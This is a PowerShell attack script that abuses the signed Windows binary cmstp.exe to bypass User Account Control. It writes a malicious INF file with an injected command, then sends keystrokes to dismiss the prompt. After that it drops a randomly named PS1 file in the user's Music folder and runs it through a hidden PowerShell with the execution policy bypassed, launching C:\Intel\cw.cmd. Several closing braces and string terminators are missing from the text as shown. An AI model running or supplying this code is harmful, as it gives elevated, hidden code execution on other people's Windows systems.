function Run {
param(
[string]$CustomCommand,
[string]$InfFile
$BinaryPath = "C:\Windows\System32\cmstp.exe"
$TempDir = [System.IO.Path]::GetTempPath()
$RandomFileName = [System.IO.Path]::GetRandomFileName()
if (-not $InfFile) {
$InfFile = Join-Path -Path $TempDir -ChildPath "$RandomFileName.inf"
# Define the INF file content
$InfContent = @"
[version]
Signature=`$chicago`$
AdvancedINF=2.5
[DefaultInstall]
CustomDestination=CustInstDestSectionAllUsers
RunPreSetupCommands=RunPreSetupCommandsSection
[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
$CustomCommand
taskkill /IM cmstp.exe /F
[CustInstDestSectionAllUsers]
49000,49001=AllUSer_LDIDSection, 7
[AllUSer_LDIDSection]
""HKLM"", ""SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\CMMGR32.EXE"", ""ProfileInstallPath"", ""%UnexpectedError%"", """"
[Strings]
ServiceName=""CorpVPN""
ShortSvcName=""CorpVPN""
# Write the INF file content to the generated file using default encoding
$InfContent | Out-File -FilePath $InfFile -Encoding ASCII
Write-Host "Payload inf written to $InfFile" -ForeGroundColor Green
$processStartInfo = New-Object System.Diagnostics.ProcessStartInfo
$processStartInfo.FileName = $BinaryPath
$processStartInfo.Arguments = "/au $InfFile"
$processStartInfo.UseShellExecute = $false
$process = [System.Diagnostics.Process]::Start($processStartInfo)
# activate the window
Add-Type @"
using System;
using System.Runtime.InteropServices;
public class User32 {
[DllImport("user32.dll")]
[return: MarshalAs(UnmanagedType.Bool)]
public static extern bool SetForegroundWindow(IntPtr hWnd);
}
# Set the window to the foreground
[User32]::SetForegroundWindow($process.MainWindowHandle)
# Wait for a moment 280 is lowest it can go
Start-Sleep -milliseconds 280
# Send the Enter key to the window
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.SendKeys]::SendWait("~")
########################### PS1 file #####################################
$musicDirectory = [System.Environment]::GetFolderPath('MyMusic')
# Generate a random PS1 file name
$randomFileName = [System.IO.Path]::GetRandomFileName()
$randomFileName = $randomFileName -replace '\.',''
$ps1FileName = "$randomFileName.ps1"
######################### Define Payload #################################
# Define the content of the PS1 file
$ps1Content = @"
Start-Process C:\Intel\cw.cmd
# Construct the full path for the PS1 file
$ps1FilePath = Join-Path -Path $musicDirectory -ChildPath $ps1FileName
# Create the PS1 file and write the content
$ps1Content | Set-Content -Path $ps1FilePath -Force
Write-Host "Random PS1 file created at: $ps1FilePath"
############## RUN ###############
$FinalPath = $ps1FilePath
$Command = "powershell.exe -noprofile -WindowStyle hidden -ExecutionPolicy Bypass " + $FinalPath
Run -CustomCommand "$Command"